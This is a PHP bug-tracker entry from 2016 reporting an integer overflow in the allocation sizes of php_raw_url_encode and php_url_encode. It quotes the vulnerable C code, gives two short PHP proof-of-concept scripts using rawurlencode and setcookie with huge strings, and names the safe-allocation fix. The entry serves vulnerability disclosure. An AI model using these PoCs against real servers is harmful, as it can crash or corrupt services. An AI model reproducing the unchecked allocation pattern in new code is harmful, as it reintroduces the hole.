|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-03-21 05:38 UTC] stas@php.net
[2016-03-21 06:10 UTC] stas@php.net
-Type: Security
+Type: Bug
[2016-03-21 06:11 UTC] stas@php.net
[2016-03-21 06:11 UTC] stas@php.net
-Status: Open
+Status: Closed
[2016-07-20 11:32 UTC] davey@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sat Feb 22 17:01:28 2025 UTC |
Description: ------------ Vulnerable code: ``` PHPAPI zend_string *php_raw_url_encode(char const *s, size_t len) { ... str = zend_string_alloc(3 * len, 0); for (x = 0, y = 0; len--; x++, y++) { ZSTR_VAL(str)[y] = (unsigned char) s[x]; ... PHPAPI zend_string *php_url_encode(char const *s, size_t len) { ... start = zend_string_alloc(3 * len, 0); ``` PoC: ``` <?php //php_raw_url_encode ini_set('memory_limit', -1); rawurlencode(str_repeat('A', 0xffffffff/3)); ``` ``` <?php //php_url_encode ini_set('memory_limit', -1); setcookie('hi', str_repeat('A', 0xffffffff/3)); ``` Fix: uses zend_string_safe_alloc instead